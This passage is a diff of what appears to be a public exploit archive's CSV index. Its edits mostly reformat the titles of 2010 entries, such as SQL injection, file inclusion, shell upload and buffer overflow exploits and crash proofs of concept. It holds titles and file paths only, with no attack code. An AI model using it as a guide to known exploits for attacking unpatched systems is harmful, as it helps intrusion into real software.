Injection",2010-02-25,Ariko-Security,php,webapps,0 11580,platforms/aix/webapps/11580.txt,"FileExecutive 1 - Multiple Vulnerabilities",2010-02-26,"ViRuSMaN ",aix,webapps,0 11581,platforms/windows/local/11581.py,"Orbital Viewer 1.04 - (.orb) Local Universal SEH Overflow Exploit (0Day)",2010-02-26,mr_me,windows,local,0 -11582,platforms/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo news.php - SQL Injection",2010-02-27,"Easy Laster",php,webapps,0 +11582,platforms/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo - news.php SQL Injection",2010-02-27,"Easy Laster",php,webapps,0 11583,platforms/php/webapps/11583.pl,"Gravity Board X 2.0 BETA (Public Release 3) - SQL Injection",2010-02-27,Ctacok,php,webapps,0 11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - (Auth Bypass) SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 11585,platforms/php/webapps/11585.txt,"phpCDB 1.0 - Local File Inclusion",2010-02-27,"cr4wl3r ",php,webapps,0 @@ -10655,7 +10655,7 @@ id,file,description,date,author,platform,type,port 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21 / 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0 -11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' (id) news.php - SQL Injection",2010-03-08,"Easy Laster",php,webapps,0 +11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' - (id) news.php SQL Injection",2010-03-08,"Easy Laster",php,webapps,0 11655,platforms/php/webapps/11655.txt,"TRIBISUR 2.0 - Local File Inclusion",2010-03-08,"cr4wl3r ",php,webapps,0 11656,platforms/windows/local/11656.py,"QuickZip 4.x - (.zip) Local Universal Buffer Overflow PoC Exploit (0Day)",2010-03-08,"corelanc0d3r and mr_me",windows,local,0 11657,platforms/php/webapps/11657.txt,"Chaton 1.5.2 - Local File Inclusion",2010-03-08,"cr4wl3r ",php,webapps,0 @@ -10669,7 +10669,7 @@ id,file,description,date,author,platform,type,port 11669,platforms/windows/dos/11669.py,"JAD java decompiler 1.5.8g (argument) Local Crash",2010-03-09,l3D,windows,dos,0 11670,platforms/windows/dos/11670.py,"JAD java decompiler 1.5.8g - (.class) Stack Overflow DoS",2010-03-09,l3D,windows,dos,0 11671,platforms/php/webapps/11671.txt,"mhproducts kleinanzeigenmarkt search.php SQL Injection",2010-03-09,"Easy Laster",php,webapps,0 -11672,platforms/php/webapps/11672.txt,"Wild CMS SQL Injection",2010-03-09,Ariko-Security,php,webapps,0 +11672,platforms/php/webapps/11672.txt,"Wild CMS - SQL Injection",2010-03-09,Ariko-Security,php,webapps,0 11674,platforms/php/webapps/11674.txt,"nus newssystem 1.02 - (id) SQL Injection",2010-03-09,n3w7u,php,webapps,0 11676,platforms/php/webapps/11676.txt,"Campsite 3.3.5 - CSRF",2010-03-10,"pratul agrawal",php,webapps,0 11677,platforms/hardware/webapps/11677.txt,"Friendly-Tech FriendlyTR69 CPE Remote Management 2.8.9 - SQL Injection",2010-03-10,"Yaniv Miron",hardware,webapps,0 @@ -10679,7 +10679,7 @@ id,file,description,date,author,platform,type,port 11681,platforms/php/webapps/11681.txt,"ispCP Omega 1.0.4 - Remote File Inclusion",2010-03-10,"cr4wl3r ",php,webapps,0 14092,platforms/windows/local/14092.c,"Kingsoft Writer 2010 - Stack Buffer Overflow",2010-06-28,"fl0 fl0w",windows,local,0 11682,platforms/windows/local/11682.py,"Mini-stream Ripper 3.0.1.1 - (.m3u) HREF Buffer Overflow",2010-03-10,l3D,windows,local,0 -11683,platforms/windows/remote/11683.rb,"Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (Metasploit)",2010-03-10,Trancer,windows,remote,0 +11683,platforms/windows/remote/11683.rb,"Microsoft Internet Explorer - iepeers.dll Use-After-Free Exploit (Metasploit)",2010-03-10,Trancer,windows,remote,0 11684,platforms/php/webapps/11684.txt,"Joomla com_about - SQL Injection",2010-03-11,snakespc,php,webapps,0 11685,platforms/php/webapps/11685.txt,"ATutor 1.6.4 - Multiple Cross-Site Scripting",2010-03-11,ITSecTeam,php,webapps,0 11686,platforms/php/webapps/11686.txt,"ANE CMD CRSF - Add Admin",2010-03-11,"pratul agrawal",php,webapps,0 @@ -10696,7 +10696,7 @@ id,file,description,date,author,platform,type,port 11699,platforms/php/webapps/11699.txt,"Joomla Component com_family - SQL Injection",2010-03-12,"DevilZ TM",php,webapps,0 11701,platforms/php/webapps/11701.txt,"Easynet Forum Host - (topic.php) SQL Injection",2010-03-12,"Yakir Wizman",php,webapps,0 11702,platforms/php/webapps/11702.pl,"Invision Power Board Currency Mod 1.3 - (edit) SQL injection",2010-03-12,"Yakir Wizman",php,webapps,0 -11704,platforms/php/webapps/11704.txt,"dreamlive auktionshaus script news.php - (id) SQL Injection",2010-03-12,"Easy Laster",php,webapps,0 +11704,platforms/php/webapps/11704.txt,"dreamlive auktionshaus script - news.php (id) SQL Injection",2010-03-12,"Easy Laster",php,webapps,0 11705,platforms/multiple/dos/11705.c,"FreeBSD and OpenBSD 'ftpd' NULL Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - (.stats) Stack Buffer Overflow PoC",2010-03-12,ITSecTeam,windows,dos,0 11707,platforms/php/webapps/11707.txt,"Joomla Component com_juliaportfolio - Local File Inclusion",2010-03-12,"DevilZ TM",php,webapps,80 @@ -10741,7 +10741,7 @@ id,file,description,date,author,platform,type,port 11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script Cross-Site Scripting",2010-03-15,indoushka,php,webapps,0 11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Upload",2010-03-15,indoushka,php,webapps,0 11746,platforms/php/webapps/11746.txt,"Torrent Hoster Remont Upload Exploit",2010-03-15,EL-KAHINA,php,webapps,0 -11747,platforms/php/webapps/11747.txt,"CH-CMS.ch-V2 Upload",2010-03-15,EL-KAHINA,php,webapps,0 +11747,platforms/php/webapps/11747.txt,"CH-CMS.ch-V2 - Upload",2010-03-15,EL-KAHINA,php,webapps,0 11748,platforms/php/webapps/11748.txt,"INTERSPIRE SHOPPING CART 5.5.4 - Ultimate Edition backup dump",2010-03-15,indoushka,php,webapps,0 11749,platforms/php/webapps/11749.txt,"Subdreamer 3.0.1 - CMS upload",2010-03-15,indoushka,php,webapps,0 11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= 8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote Overflow Exploit (0Day)",2010-03-15,mr_me,windows,remote,0 @@ -10778,7 +10778,7 @@ id,file,description,date,author,platform,type,port 11784,platforms/php/webapps/11784.txt,"PostNuke FormExpress Module Blind SQL Injection",2010-03-17,"Ali Abbasi",php,webapps,0 11785,platforms/php/webapps/11785.txt,"Joomla Component com_ckforms - Multiple Vulnerabilities",2010-03-17,"ALTBTA ",php,webapps,0 11786,platforms/windows/local/11786.txt,"Virtual PC Hypervisor Memory Protection",2010-03-17,"Core Security",windows,local,0 -11787,platforms/windows/local/11787.py,"Adobe Reader PDF LibTiff Integer Overflow Code Execution",2010-03-17,villy,windows,local,0 +11787,platforms/windows/local/11787.py,"Adobe Reader PDF - LibTiff Integer Overflow Code Execution",2010-03-17,villy,windows,local,0 11788,platforms/php/webapps/11788.txt,"PHP-Nuke ratedownload SQL Injection",2010-03-17,ITSecTeam,php,webapps,0 11789,platforms/multiple/local/11789.c,"VariCAD 2010-2.05 EN Local Buffer Overflow",2010-03-17,n00b,multiple,local,0 11790,platforms/php/webapps/11790.txt,"Joomla Component com_vxdate - Multiple Vulnerabilities",2010-03-17,MustLive,php,webapps,0 @@ -10811,7 +10811,7 @@ id,file,description,date,author,platform,type,port 11825,platforms/php/webapps/11825.html,"Adult Video Site Script - Multiple Vulnerabilities",2010-03-21,indoushka,php,webapps,0 11826,platforms/php/webapps/11826.txt,"Jewelry Cart Software - (product.php) SQL Injection",2010-03-21,Asyraf,php,webapps,0 11827,platforms/windows/dos/11827.py,"no$gba 2.5c - (.nds) Local crash",2010-03-21,l3D,windows,dos,0 -11828,platforms/windows/local/11828.py,"Crimson Editor r3.70 SEH Overwrite PoC Exploit",2010-03-21,mr_me,windows,local,0 +11828,platforms/windows/local/11828.py,"Crimson Editor r3.70 - SEH Overwrite PoC Exploit",2010-03-21,mr_me,windows,local,0 11829,platforms/php/webapps/11829.txt,"Woltlab Burning Board Lite Addon - (lexikon.php) SQL Injection",2010-03-21,n3w7u,php,webapps,0 11830,platforms/php/webapps/11830.txt,"Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote File Inclusion",2010-03-21,"cr4wl3r ",php,webapps,0 11831,platforms/php/webapps/11831.txt,"WebMaid CMS 0.2-6 Beta - Multiple Remote File Inclusion",2010-03-21,"cr4wl3r ",php,webapps,0 @@ -10842,14 +10842,14 @@ id,file,description,date,author,platform,type,port 11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - (.mp3) Local Crash PoC",2010-03-24,chap0,windows,dos,0 11862,platforms/php/webapps/11862.txt,"Easy-Clanpage 2.0 - Blind SQL Injection Exploit",2010-03-24,"Easy Laster",php,webapps,0 11863,platforms/php/webapps/11863.txt,"CMS By SoftnSolv - (index.php) SQL Injection",2010-03-24,"Th3 RDX",php,webapps,0 -11864,platforms/php/webapps/11864.txt,"E-php CMS SQL Injection",2010-03-24,"Th3 RDX",php,webapps,0 +11864,platforms/php/webapps/11864.txt,"E-php CMS - SQL Injection",2010-03-24,"Th3 RDX",php,webapps,0 11865,platforms/php/webapps/11865.txt,"Joomla component com_universal - Remote File Inclusion Exploit",2010-03-24,eidelweiss,php,webapps,0 11866,platforms/php/webapps/11866.txt,"New CMS Local File Inclusion",2010-03-24,Xash,php,webapps,0 11867,platforms/php/webapps/11867.txt,"Joomla Component com_wallpapers - SQL Injection",2010-03-24,"DevilZ TM",php,webapps,0 11868,platforms/php/webapps/11868.txt,"Joomla Component com_software - SQL Injection",2010-03-24,"DevilZ TM",php,webapps,0 11871,platforms/php/webapps/11871.txt,"Vbulletin Blog 4.0.2 Title XSS",2010-03-24,FormatXformat,php,webapps,0 11872,platforms/windows/local/11872.py,"KenWard's Zipper 1.400 - Buffer Overflow Method 2",2010-03-25,sinn3r,windows,local,0 -11873,platforms/php/webapps/11873.txt,"Interactivefx.ie CMS SQL Injection",2010-03-25,Inj3ct0r,php,webapps,0 +11873,platforms/php/webapps/11873.txt,"Interactivefx.ie CMS - SQL Injection",2010-03-25,Inj3ct0r,php,webapps,0 11874,platforms/php/webapps/11874.txt,"INVOhost SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0 11875,platforms/php/webapps/11875.py,"Easy-Clanpage 2.01 - SQL Injection Exploit",2010-03-25,"Easy Laster",php,webapps,0 11876,platforms/php/webapps/11876.txt,"justVisual 2.0 - (index.php) LFI",2010-03-25,eidelweiss,php,webapps,0 @@ -10868,7 +10868,7 @@ id,file,description,date,author,platform,type,port 11890,platforms/ios/dos/11890.txt,"iOS Safari - Bad 'VML' Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0 11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0 11892,platforms/php/webapps/11892.txt,"post Card (catid) SQL Injection",2010-03-26,"Hussin X",php,webapps,0 -11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0 +11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 - DoS",2010-03-26,OrderZero,linux,dos,0 11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0 11895,platforms/php/webapps/11895.txt,"CyberCMS - SQL Injection",2010-03-26,hc0de,php,webapps,0 11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0 @@ -10982,16 +10982,16 @@ id,file,description,date,author,platform,type,port 12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf - (module downloads) SQL Injection Exploit",2010-04-03,Inj3ct0r,php,webapps,0 12029,platforms/asp/webapps/12029.txt,"SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery",2010-04-03,"cp77fk4r ",asp,webapps,0 12030,platforms/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticate) bof PoC",2010-04-03,d3b4g,windows,dos,0 -12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites Remote Add Admin Exploit",2010-04-03,alnjm33,php,webapps,0 +12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites - Remote Add Admin Exploit",2010-04-03,alnjm33,php,webapps,0 12032,platforms/windows/dos/12032.html,"Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution",2010-04-03,ZSploit.com,windows,dos,0 12033,platforms/multiple/remote/12033.txt,"Java Mini Web Server 1.0 - Path Traversal / Cross-Site Scripting",2010-04-03,"cp77fk4r ",multiple,remote,0 12034,platforms/php/webapps/12034.txt,"flatpress 0.909.1 - Stored XSS",2010-04-03,ITSecTeam,php,webapps,0 12035,platforms/windows/local/12035.pl,"ZipScan 2.2c SEH",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router - CSRF / Persistent XSS Exploit",2010-04-03,l3D,hardware,webapps,0 12037,platforms/php/webapps/12037.txt,"Joomla component jp_jobs - SQL Injection",2010-04-03,Valentin,php,webapps,0 -12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites Bypass Create And Download SQL Backup",2010-04-04,indoushka,php,webapps,0 +12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites - Bypass Create And Download SQL Backup",2010-04-04,indoushka,php,webapps,0 12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 Backup Dump",2010-04-04,indoushka,multiple,webapps,0 -12041,platforms/php/webapps/12041.txt,"Solutive CMS SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0 +12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0 12042,platforms/php/webapps/12042.txt,"x10 mirco blogging 121 - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0 12043,platforms/php/webapps/12043.html,"Prediction League 0.3.8 - CSRF Create Admin User Exploit",2010-04-04,indoushka,php,webapps,0 12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication BoF Exploit",2010-04-04,x90c,windows,remote,0 @@ -11043,10 +11043,10 @@ id,file,description,date,author,platform,type,port 12093,platforms/hardware/dos/12093.txt,"McAfee Email Gateway (formerly IronMail) - Denial of Service",2010-04-06,"Nahuel Grisolia",hardware,dos,0 12094,platforms/php/webapps/12094.txt,"ShopSystem SQL Injection",2010-04-06,Valentin,php,webapps,0 12095,platforms/linux/dos/12095.txt,"Virata EmWeb R6.0.1 - Remote Crash",2010-04-06,"Jobert Abma",linux,dos,0 -12096,platforms/windows/dos/12096.txt,"Juke 4.0.2 DoS Multiple Files",2010-04-06,anonymous,windows,dos,0 +12096,platforms/windows/dos/12096.txt,"Juke 4.0.2 - DoS Multiple Files",2010-04-06,anonymous,windows,dos,0 12097,platforms/php/webapps/12097.txt,"Joomla Component XOBBIX - prodid SQL Injection",2010-04-06,AntiSecurity,php,webapps,0 12098,platforms/php/webapps/12098.txt,"WordPress Plugin NextGEN Gallery 1.5.1 - XSS",2010-04-06,"Alejandro Rodriguez",php,webapps,0 -12100,platforms/asp/webapps/12100.txt,"Espinas CMS SQL Injection",2010-04-07,"Pouya Daneshmand",asp,webapps,0 +12100,platforms/asp/webapps/12100.txt,"Espinas CMS - SQL Injection",2010-04-07,"Pouya Daneshmand",asp,webapps,0 12101,platforms/php/webapps/12101.txt,"Joomla Component aWiki com_awiki - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 12102,platforms/php/webapps/12102.txt,"Joomla Component VJDEO com_vjdeo 1.0 - LFI",2010-04-07,"Angela Zhang",php,webapps,0 12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) 2.11.1 - Exploit",2010-04-07,Rh0,multiple,local,0 @@ -11055,13 +11055,13 @@ id,file,description,date,author,platform,type,port 12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost - Multiple Vulnerabilities",2010-04-07,indoushka,php,webapps,0 12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusion",2010-04-07,eidelweiss,php,webapps,0 12108,platforms/php/webapps/12108.txt,"Joomla Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0 -12109,platforms/multiple/dos/12109.txt,"Multiple Vendor librpc.dll Signedness Error Remote Code Execution",2010-04-08,ZSploit.com,multiple,dos,0 +12109,platforms/multiple/dos/12109.txt,"Multiple Vendor librpc.dll Signedness Error - Remote Code Execution",2010-04-08,ZSploit.com,multiple,dos,0 12110,platforms/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption DoS",2010-04-08,"Jonathan Salwan",windows,dos,0 12111,platforms/php/webapps/12111.txt,"Joomla Component Webee Comments - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 12112,platforms/php/webapps/12112.txt,"Joomla Component Realtyna Translator - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 12113,platforms/php/webapps/12113.txt,"Joomla Component AWDwall-Joomla - LFI / SQLi [cbuser]",2010-04-08,AntiSecurity,php,webapps,0 12114,platforms/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0 -12115,platforms/php/webapps/12115.txt,"Kubeit CMS SQL Injection",2010-04-08,Phenom,php,webapps,0 +12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0 12117,platforms/windows/remote/12117.txt,"Java Deployment Toolkit Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",windows,remote,0 12118,platforms/php/webapps/12118.txt,"Joomla Component PowerMail Pro com_powermail - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0 12119,platforms/windows/remote/12119.pl,"Windows FTP Server 1.4 - Auth Bypass",2010-04-09,chap0,windows,remote,0 @@ -11070,11 +11070,11 @@ id,file,description,date,author,platform,type,port 12122,platforms/multiple/remote/12122.txt,"JAVA Web Start Arbitrary command-line injection",2010-04-09,"Ruben Santamarta ",multiple,remote,0 12123,platforms/php/webapps/12123.txt,"Joomla Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,php,webapps,0 12124,platforms/php/webapps/12124.txt,"Joomla Component huruhelpdesk - SQL Injection",2010-04-09,bumble_be,php,webapps,0 -12128,platforms/php/webapps/12128.txt,"GarageSales Remote Upload",2010-04-09,saidinh0,php,webapps,0 +12128,platforms/php/webapps/12128.txt,"GarageSales - Remote Upload",2010-04-09,saidinh0,php,webapps,0 12130,platforms/linux/local/12130.py,"ReiserFS xattr (Linux Kernel 2.6.34-rc3) (Redhat / Ubuntu 9.10) - Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0 12132,platforms/php/webapps/12132.pl,"joomla component com_agenda 1.0.1 - (id) SQL Injection",2010-04-09,v3n0m,php,webapps,0 -12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 Shell Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0 +12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 - Shell Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0 12134,platforms/php/webapps/12134.txt,"MMHAQ CMS - SQLi",2010-04-10,s1ayer,php,webapps,0 12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps,0 12136,platforms/php/webapps/12136.txt,"Joomla Component com_properties[aid] - SQL Injection",2010-04-10,c4uR,php,webapps,0 @@ -11104,7 +11104,7 @@ id,file,description,date,author,platform,type,port 12160,platforms/php/webapps/12160.txt,"HotNews 0.7.2 - Remote File Inclusion",2010-04-11,team_elite,php,webapps,0 12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Unspecified Memory Corruption PoC",2010-04-11,LiquidWorm,windows,dos,0 12162,platforms/php/webapps/12162.txt,"Joomla component mv_restaurantmenumanager - SQL Injection",2010-04-11,Sudden_death,php,webapps,0 -12163,platforms/php/webapps/12163.txt,"Worldviewer.com CMS SQL Injection",2010-04-12,"41.w4r10r aka AN1L",php,webapps,0 +12163,platforms/php/webapps/12163.txt,"Worldviewer.com CMS - SQL Injection",2010-04-12,"41.w4r10r aka AN1L",php,webapps,0 12164,platforms/php/webapps/12164.txt,"YaPig 0.94.0u - Remote File Inclusion",2010-04-12,JIKO,php,webapps,0 12165,platforms/multiple/dos/12165.txt,"PHP 5.3.0 - getopt() Denial of Service",2010-04-12,Napst3r,multiple,dos,0 12166,platforms/php/webapps/12166.txt,"Joomla Component Web TV com_webtv - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 @@ -11202,12 +11202,12 @@ id,file,description,date,author,platform,type,port 12265,platforms/hardware/remote/12265.txt,"Iomega Home Media Network Hard Drive 2.038 < 2.061 - Unauthenticated File-system Access",2010-04-16,fizix610,hardware,remote,0 12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - CSRF Change Username + Password Exploit",2010-04-16,EL-KAHINA,php,webapps,0 12267,platforms/php/webapps/12267.txt,"WebAdmin Shell Upload",2010-04-16,DigitALL,php,webapps,0 -12268,platforms/php/webapps/12268.txt,"Uploader 0.7 Shell Upload",2010-04-16,DigitALL,php,webapps,0 +12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Shell Upload",2010-04-16,DigitALL,php,webapps,0 12269,platforms/php/webapps/12269.txt,"Joomla Component com_joltcard - SQL Injection",2010-04-16,Valentin,php,webapps,0 12270,platforms/php/webapps/12270.txt,"Joomla Component com_pandafminigames - SQL Injection",2010-04-16,Valentin,php,webapps,0 12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Shell Upload",2010-04-17,DigitALL,php,webapps,0 12273,platforms/windows/dos/12273.py,"Windows 7/2008R2 SMB Client Trans2 - Stack Overflow 10-020 PoC",2010-04-17,"laurent gaffie",windows,dos,0 -12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0 +12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0 12276,platforms/php/webapps/12276.txt,"redaxo CMS 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,php,webapps,0 12277,platforms/php/webapps/12277.txt,"Openscrutin 1.03 - (RFI/LFI) Multiple File Include",2010-04-18,"cr4wl3r ",php,webapps,0 12278,platforms/php/webapps/12278.txt,"Alegro 1.2.1 - SQL Injection",2010-04-18,indoushka,php,webapps,0 @@ -11251,7 +11251,7 @@ id,file,description,date,author,platform,type,port 12320,platforms/windows/remote/12320.txt,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Remote Buffer Overflow",2010-04-21,shinnai,windows,remote,0 12322,platforms/php/webapps/12322.txt,"LightNEasy 3.1.x - Multiple Vulnerabilite",2010-04-21,ITSecTeam,php,webapps,0 12323,platforms/php/webapps/12323.txt,"wb news (webmobo) 2.3.3 - Stored XSS",2010-04-21,ITSecTeam,php,webapps,0 -12324,platforms/multiple/dos/12324.py,"Multiple Browsers Audio Tag DoS",2010-04-21,"Chase Higgins",multiple,dos,0 +12324,platforms/multiple/dos/12324.py,"Multiple Browsers - Audio Tag DoS",2010-04-21,"Chase Higgins",multiple,dos,0 12325,platforms/php/webapps/12325.txt,"Joomla Component com_portfolio - Local File Disclosure",2010-04-21,Mr.tro0oqy,php,webapps,0 12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - zgtips.dll Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 12329,platforms/asp/webapps/12329.txt,"CactuShop - User Invoices Persistent XSS",2010-04-21,7Safe,asp,webapps,0 @@ -11276,7 +11276,7 @@ id,file,description,date,author,platform,type,port 12351,platforms/php/webapps/12351.txt,"memorial Web site script - (id) SQL Injection",2010-04-23,v3n0m,php,webapps,0 12353,platforms/php/webapps/12353.txt,"EPay Enterprise 4.13 - (cid) SQL Injection",2010-04-23,v3n0m,php,webapps,0 12354,platforms/php/webapps/12354.pl,"NKINFOWEB SQL Injection Exploit",2010-04-23,d4rk-h4ck3r,php,webapps,0 -12355,platforms/php/webapps/12355.pl,"Excitemedia CMS SQL Injection",2010-04-23,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 +12355,platforms/php/webapps/12355.pl,"Excitemedia CMS - SQL Injection",2010-04-23,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Denial of Service (BSOD)",2010-04-23,p4r4N0ID,windows,dos,0 12358,platforms/php/webapps/12358.txt,"Memorial Web Site Script - Reset Password & Insecure Cookie Handling",2010-04-23,"Chip d3 bi0s",php,webapps,0 12359,platforms/php/webapps/12359.txt,"Memorial Web Site Script - Multiple Arbitrary Delete",2010-04-23,"Chip d3 bi0s",php,webapps,0 @@ -11320,17 +11320,17 @@ id,file,description,date,author,platform,type,port 12408,platforms/windows/dos/12408.pl,"Safari 4.0.5 - (531.22.7) Denial of Service",2010-04-26,"Xss mAn",windows,dos,0 12410,platforms/php/webapps/12410.txt,"PostNuke 0.764 Module modload SQL Injection",2010-04-26,BILGE_KAGAN,php,webapps,0 12411,platforms/php/webapps/12411.txt,"FreeRealty(Free Real Estate Listing Software) - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 -12412,platforms/php/webapps/12412.txt,"Ramaas Software CMS SQL Injection",2010-04-27,41.w4r10r,php,webapps,0 +12412,platforms/php/webapps/12412.txt,"Ramaas Software CMS - SQL Injection",2010-04-27,41.w4r10r,php,webapps,0 12413,platforms/php/webapps/12413.txt,"i-Net Online Community XSS and Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12414,platforms/php/webapps/12414.txt,"2DayBiz Auction Script - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12415,platforms/php/webapps/12415.txt,"Infocus Real Estate Enterprise Edition Script Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12416,platforms/php/webapps/12416.txt,"PHP Quick Arcade 3.0.21 - Multiple Vulnerabilites",2010-04-27,ITSecTeam,php,webapps,0 12417,platforms/windows/remote/12417.py,"Bigant Messenger 2.52 - (AntCore.dll) RegisterCom() Remote Heap Overflow (0Day)",2010-04-27,mr_me,windows,remote,0 -12419,platforms/php/webapps/12419.txt,"Boutique SudBox 1.2 Changer Login et Mot de Passe CSRF",2010-04-27,indoushka,php,webapps,0 +12419,platforms/php/webapps/12419.txt,"Boutique SudBox 1.2 - Changer Login et Mot de Passe CSRF",2010-04-27,indoushka,php,webapps,0 12420,platforms/php/webapps/12420.php,"Portaneo Portal 2.2.3 - Remote Arbitrary File Upload Exploit",2010-04-27,eidelweiss,php,webapps,0 12421,platforms/php/webapps/12421.txt,"Help Center Live 2.0.6 - (module=helpcenter&file=) Local File Inclusion",2010-04-27,41.w4r10r,php,webapps,0 12422,platforms/windows/dos/12422.pl,"Acoustica 3.32 CD/DVD Label Maker - (.m3u) PoC",2010-04-27,chap0,windows,dos,0 -12423,platforms/php/webapps/12423.txt,"CLScript.com Classifieds Software SQL Injection Vunerability",2010-04-27,41.w4r10,php,webapps,0 +12423,platforms/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,php,webapps,0 12424,platforms/asp/webapps/12424.txt,"Acart 2.0 Shopping Cart Software Backup Dump",2010-04-27,indoushka,asp,webapps,0 12425,platforms/windows/dos/12425.html,"Webkit (Safari 4.0.5) - Blink Tag Stack Exhaustion DoS",2010-04-27,Dr_IDE,windows,dos,0 12426,platforms/php/webapps/12426.txt,"Joomla Component Ultimate Portfolio com_ultimateportfolio - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 @@ -11343,13 +11343,13 @@ id,file,description,date,author,platform,type,port 12433,platforms/cgi/webapps/12433.py,"NIBE heat pump RCE Exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12434,platforms/cgi/webapps/12434.py,"NIBE heat pump LFI Exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0 -12436,platforms/php/webapps/12436.txt,"Pligg CMS (story.php?id) 1.0.4 - SQL Injection",2010-04-28,"Don Tukulesto",php,webapps,0 +12436,platforms/php/webapps/12436.txt,"Pligg CMS 1.0.4 - (story.php?id) SQL Injection",2010-04-28,"Don Tukulesto",php,webapps,0 12437,platforms/windows/dos/12437.html,"Safari 4.0.3 / 4.0.4 - Stack 